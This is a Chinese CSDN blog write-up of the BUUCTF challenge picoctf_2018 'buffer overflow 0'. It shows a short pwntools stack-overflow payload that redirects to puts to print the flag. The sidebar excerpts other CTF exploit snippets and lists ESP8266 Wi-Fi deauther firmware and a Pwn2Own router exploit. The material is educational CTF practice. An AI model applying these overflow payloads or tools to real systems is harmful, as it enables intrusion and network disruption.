[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

最新推荐文章于 2022-02-14 22:23:28 发布
最新推荐文章于 2022-02-14 22:23:28 发布
阅读量360 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/116238549
版权

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

好久不写BUU了,手都快生了赶快过来写写。
通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。
在这里插入图片描述
进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。
在这里插入图片描述
在这里插入图片描述

from pwn import *
elf = ELF("./PicoCTF_2018_buffer_overflow_0")
payload = 'a' * (0x18 + 4) + p32(elf.plt['puts']) + 'junk' + p32(0x0804A080)
print("payload : " + payload)

在这里插入图片描述
在这里插入图片描述

Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 401
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
[BUUCTF]PWN——picoctf_2018_buffer overflow 0
mcmuyanga的博客
03-09 422
picoctf_2018_buffer overflow 0 附件 步骤 例行检查,32位程序,开启了nx保护 提示要ssh链接 ssh连上后稍微尝试了一下,好像vuln这个程序能读出flag 32为ida载入测试文件 百度一下signal,得知11是(SIGSEGV),对存储的无效访问的信号。 15行的意思是设置了一个函数sigsegv_handler来处理当程序产生对存储的无效访问。 就是说当程序造成无效内存访问的时候,就会输出flag。 在往下看vuln函数 将src拷贝到dest中,
BUUCTF--pwn picoctf_2018_buffer overflow 0
半岛铁盒的博客
04-30 378
来查看信号函数代表的含义: 11是 SIGSEGV,表示对存储的无效访问 点进去sigsegv_handler 同时将flag的值赋予了stderr 现在知道那个信号函数的作用是: 当发生 对存储的无效访问时,会把stderr打印输出,即将flag的值打印输出 再往下有个 vuln函数 有两种解题方式 方法一: 经过前面的分析,我们知道了当发生了对 内存存储无效的访问会将flag打印出来 首先ssh链接,输入密码后 方法二:将ret覆盖成put,然后输出flag地址上的值, from pwn im..
BUUCTFPicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1324
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2
Y_peak的博客
03-17 411
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2 简单的栈溢出,不过需要将参数自己设置而已 注意负数如何转换为补码, 不知道也可以直接在汇编里面找 from pwn import * p = remote('node3.buuoj.cn',28931) a1 = 0xdeadbeef a2 = 0xdeadc0de payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2) p.re
PicoCTF_2018_buffer_overflow_1
m0sway的博客
11-28 395
PicoCTF_2018_buffer_overflow_1 使用checksec查看: 保护机制全关,看起来没啥难度。 扔进IDA中查看: 主函数中给出了漏洞函数,跟进查看: gets()函数,栈溢出,s距离ebp0x28 查看下这题的字符串可以发现函数win(): 能够直接获取到flag,直接秒了这题。 exp: from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1
Y_peak的博客
03-16 291
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWM-OUT.rar_PWN_out
09-19
原子 的PWN 输出,寄存器程序,完全寄存器操作,可以直接打开。
BUUCTFPicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 897
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)
seaaseesa的博客
05-01 829
PicoCTF_2018_buffer_overflow_3 用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8 from pwn import * shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, passwor...
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 351
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
picoctf_2018_buffer_overflow_2
z1r0的博客
12-11 174
picoctf_2018_buffer_overflow_2 查看保护 有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3594
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值